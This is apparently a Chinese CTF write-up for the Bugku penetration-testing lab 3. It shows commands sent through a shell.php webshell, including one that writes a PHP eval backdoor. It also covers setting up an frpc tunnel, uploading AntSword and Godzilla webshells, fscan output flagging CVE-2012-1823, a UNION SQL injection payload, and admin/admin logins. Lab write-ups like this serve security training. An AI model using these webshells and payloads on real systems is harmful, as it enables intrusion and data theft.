bugku渗透测试3 WP

flag1,2,3




爆破网段

发现1,2,10,138,250的时候有变化


猜测木马文件名为shell.php




远程下载frpc

http://192.168.0.10/shell.php?cmd=chmod 777 frpc
http://192.168.0.10/shell.php?cmd=./frpc -c frpc.ini

192.168.0.10/shell.php?cmd=echo "<?php phpinfo();@eval(\$_POST[1]);?>" > 1.php

然后利用蚁剑上传哥斯拉的木马

利用哥斯拉上传fscan扫描

避坑无ping权限

fscan加上-np参数
./fscan -np -h xxx > 1.txt

start infoscan
192.168.0.1:22 open
192.168.0.10:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.138:80 open
192.168.0.250:80 open
192.168.0.2:9000 open
192.168.0.10:9000 open
192.168.0.250:9000 open
[*] WebTitle: http://192.168.0.138      code:200 len:953    title:Bugku分数查询系统
[*] WebTitle: http://192.168.0.1        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle: http://192.168.0.250      code:200 len:2035   title:用户登录
[*] WebTitle: http://192.168.0.10       code:200 len:770    title:葫芦娃小组
[+] http://192.168.0.250 poc-yaml-eea-info-leak-cnvd-2021-10543 
[+] http://192.168.0.250 poc-yaml-php-cgi-cve-2012-1823 
[+] http://192.168.0.10 poc-yaml-php-cgi-cve-2012-1823

10.10.0.1:22 open
10.10.0.22:80 open
10.10.0.5:80 open
10.10.0.1:80 open
10.10.0.5:9000 open
10.10.0.22:9000 open
[*] WebTitle: http://10.10.0.5          code:200 len:770    title:葫芦娃小组
[*] WebTitle: http://10.10.0.22         code:200 len:3764   title:Bugku 渗透测试3 - home
[+] http://10.10.0.5 poc-yaml-php-cgi-cve-2012-1823 
[+] http://10.10.0.1 poc-yaml-php-cgi-cve-2012-1823

flag7,8
http://192.168.0.250/
配置burpsuite的socks5代理





flag4
http://192.168.0.138
0 union select 1,2,3,flag from flag

flag5,6
http://10.10.0.22/


http://10.10.0.22/admin.php弱口令 admin admin

本栏目推荐文章
• 春秋云境 Delegation WP
• CTFshow元旦水友赛 Crypto wp
• NewStarCTF 2023 Week1 MISC-wp
• 春秋云镜 Hospital WP
• CTFshow元旦水友赛 CRYPTO WP
• CBCTF pyjail wp
• 春秋云境Exchange WP
• 【wargames】bandit0~9关wp
• 2023NCTF Misc Crypto 部分WP
• 2023“强网杯”部分WP

bugku WPbugku wp 文件bugku wp bugku bugku-xxx bugku-web bugku-misc bugku-eval bugku-misc bugku misc bugku-simple_ssti misc_bugku_writeup